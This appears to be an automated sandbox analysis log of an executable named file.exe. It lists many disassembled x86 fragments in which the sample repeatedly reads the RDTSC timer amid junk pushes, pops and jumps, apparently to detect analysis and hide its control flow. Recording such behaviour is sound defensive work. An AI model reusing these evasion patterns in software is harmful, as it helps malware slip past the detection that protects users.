                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291538 second address: 12915AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 4766B94Bh 0x0000000d mov esi, dword ptr [ebp+122D3879h] 0x00000013 push 00000003h 0x00000015 mov esi, eax 0x00000017 mov esi, dword ptr [ebp+122D3A71h] 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 call 00007F5CB8E4DD98h 0x00000027 pop ecx 0x00000028 mov dword ptr [esp+04h], ecx 0x0000002c add dword ptr [esp+04h], 0000001Bh 0x00000034 inc ecx 0x00000035 push ecx 0x00000036 ret 0x00000037 pop ecx 0x00000038 ret 0x00000039 xor ecx, dword ptr [ebp+122D38B9h] 0x0000003f mov dword ptr [ebp+122D1B7Dh], esi 0x00000045 push 00000003h 0x00000047 movsx edx, si 0x0000004a call 00007F5CB8E4DD99h 0x0000004f pushad 0x00000050 pushad 0x00000051 jmp 00007F5CB8E4DDA6h 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12915AE second address: 12915D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5CB8E489A7h 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12915D0 second address: 12915EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5CB8E4DD96h 0x0000000a popad 0x0000000b pop esi 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push edi 0x00000011 pushad 0x00000012 jno 00007F5CB8E4DD96h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12915EA second address: 1291602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 jp 00007F5CB8E4899Ch 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291602 second address: 129161F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5CB8E4DD9Dh 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129161F second address: 1291623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291623 second address: 1291629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291629 second address: 1291665 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push esi 0x0000000c call 00007F5CB8E489A5h 0x00000011 push edi 0x00000012 pop ecx 0x00000013 pop edx 0x00000014 pop edi 0x00000015 lea ebx, dword ptr [ebp+124532DEh] 0x0000001b mov dword ptr [ebp+122D1B33h], eax 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 jg 00007F5CB8E48998h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291729 second address: 129172E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129172E second address: 1291796 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5CB8E48998h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 16A7E0FEh 0x00000013 push 00000003h 0x00000015 sub dword ptr [ebp+122D260Eh], edi 0x0000001b or ecx, dword ptr [ebp+122D3919h] 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push eax 0x00000026 call 00007F5CB8E48998h 0x0000002b pop eax 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 add dword ptr [esp+04h], 00000017h 0x00000038 inc eax 0x00000039 push eax 0x0000003a ret 0x0000003b pop eax 0x0000003c ret 0x0000003d mov dword ptr [ebp+122D1B53h], eax 0x00000043 push 00000003h 0x00000045 mov edi, 6E44801Bh 0x0000004a call 00007F5CB8E48999h 0x0000004f push edx 0x00000050 jnc 00007F5CB8E48998h 0x00000056 pop edx 0x00000057 push eax 0x00000058 push esi 0x00000059 push eax 0x0000005a push edx 0x0000005b push ecx 0x0000005c pop ecx 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291796 second address: 12917D9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5CB8E4DD96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 jl 00007F5CB8E4DDA2h 0x0000001a jmp 00007F5CB8E4DD9Ch 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 push ebx 0x00000023 pushad 0x00000024 jmp 00007F5CB8E4DD9Bh 0x00000029 push eax 0x0000002a pop eax 0x0000002b popad 0x0000002c pop ebx 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12917D9 second address: 12917DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A36D0 second address: 12A36D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B21BF second address: 12B21C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B21C7 second address: 12B21E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E4DDA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F5CB8E4DD96h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B21E9 second address: 12B21ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B04FB second address: 12B050C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5CB8E4DD96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B081F second address: 12B0825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0AB1 second address: 12B0AD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jng 00007F5CB8E4DD96h 0x0000000e popad 0x0000000f jmp 00007F5CB8E4DDA0h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0AD4 second address: 12B0AD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0AD8 second address: 12B0AE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F5CB8E4DD9Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0AE8 second address: 12B0AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0AF2 second address: 12B0AF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0AF7 second address: 12B0AFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0AFD second address: 12B0B10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5CB8E4DD9Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0C6E second address: 12B0C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5CB8E48996h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0C78 second address: 12B0C7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0C7C second address: 12B0CC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F5CB8E489A9h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jc 00007F5CB8E48996h 0x00000017 jmp 00007F5CB8E489A1h 0x0000001c jl 00007F5CB8E48996h 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0CC3 second address: 12B0CCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0CCB second address: 12B0CD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F5CB8E48996h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0CD7 second address: 12B0CDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0E33 second address: 12B0E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5CB8E48996h 0x0000000a popad 0x0000000b jbe 00007F5CB8E489A2h 0x00000011 jg 00007F5CB8E48996h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B10E0 second address: 12B1107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F5CB8E4DD9Eh 0x0000000b jne 00007F5CB8E4DD9Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 jg 00007F5CB8E4DD96h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A6CD9 second address: 12A6CDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1287529 second address: 1287540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5CB8E4DD98h 0x0000000a pop ebx 0x0000000b push ecx 0x0000000c push edx 0x0000000d jbe 00007F5CB8E4DD96h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B13FC second address: 12B1402 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B1402 second address: 12B140B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B1985 second address: 12B1989 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B1989 second address: 12B1997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F5CB8E4DD98h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B1ADA second address: 12B1B03 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5CB8E48996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F5CB8E489AFh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B1B03 second address: 12B1B31 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5CB8E4DDADh 0x00000008 pushad 0x00000009 jne 00007F5CB8E4DD96h 0x0000000f jnp 00007F5CB8E4DD96h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B5051 second address: 12B5057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B5057 second address: 12B505B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BEA25 second address: 12BEA2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BDE77 second address: 12BDE7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BDE7B second address: 12BDEE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a jmp 00007F5CB8E489A9h 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F5CB8E489A9h 0x00000016 jmp 00007F5CB8E489A2h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F5CB8E4899Eh 0x00000022 jne 00007F5CB8E48996h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BE02E second address: 12BE049 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F5CB8E4DD96h 0x0000000d jg 00007F5CB8E4DD96h 0x00000013 jbe 00007F5CB8E4DD96h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BE5C9 second address: 12BE5CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BE5CD second address: 12BE5D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BE5D1 second address: 12BE5D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BE780 second address: 12BE78A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5CB8E4DD96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BE78A second address: 12BE798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F5CB8E48996h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF0EC second address: 12BF0F2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF0F2 second address: 12BF0F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF0F8 second address: 12BF11B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E4DDA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF11B second address: 12BF12E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5CB8E4899Eh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF12E second address: 12BF134 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF2A6 second address: 12BF2AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF2AC second address: 12BF2C6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnc 00007F5CB8E4DD96h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 js 00007F5CB8E4DD96h 0x00000019 pop ecx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF3FE second address: 12BF402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF402 second address: 12BF40C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5CB8E4DD96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF40C second address: 12BF420 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5CB8E4899Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF999 second address: 12BF9B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F5CB8E4DD96h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 ja 00007F5CB8E4DD96h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BFA4A second address: 12BFA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BFA4E second address: 12BFA73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E4DDA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5CB8E4DD9Dh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BFEAB second address: 12BFEBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 js 00007F5CB8E4899Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BFF29 second address: 12BFF2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C00D6 second address: 12C00DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C099D second address: 12C09A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C09A3 second address: 12C09A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C09A9 second address: 12C09CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E4DDA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F5CB8E4DD9Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C09CD second address: 12C09D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C1BB9 second address: 12C1BCB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5CB8E4DD98h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C1BCB second address: 12C1BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C1BCF second address: 12C1BD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C4DB7 second address: 12C4DCF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5CB8E4899Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C4DCF second address: 12C4DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C1BD3 second address: 12C1BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C50D7 second address: 12C5117 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F5CB8E4DD96h 0x00000009 jg 00007F5CB8E4DD96h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 pushad 0x00000014 jmp 00007F5CB8E4DDA8h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F5CB8E4DDA2h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB46C second address: 12CB508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jnc 00007F5CB8E4899Ch 0x0000000e jne 00007F5CB8E48998h 0x00000014 popad 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F5CB8E48998h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 call 00007F5CB8E489A9h 0x00000035 jmp 00007F5CB8E4899Dh 0x0000003a pop edi 0x0000003b push 00000000h 0x0000003d mov edi, ebx 0x0000003f add dword ptr [ebp+122D2884h], edi 0x00000045 push 00000000h 0x00000047 mov dword ptr [ebp+122D1C00h], edi 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f jmp 00007F5CB8E4899Ah 0x00000054 pop eax 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F5CB8E489A2h 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB508 second address: 12CB50E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB50E second address: 12CB512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB512 second address: 12CB516 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
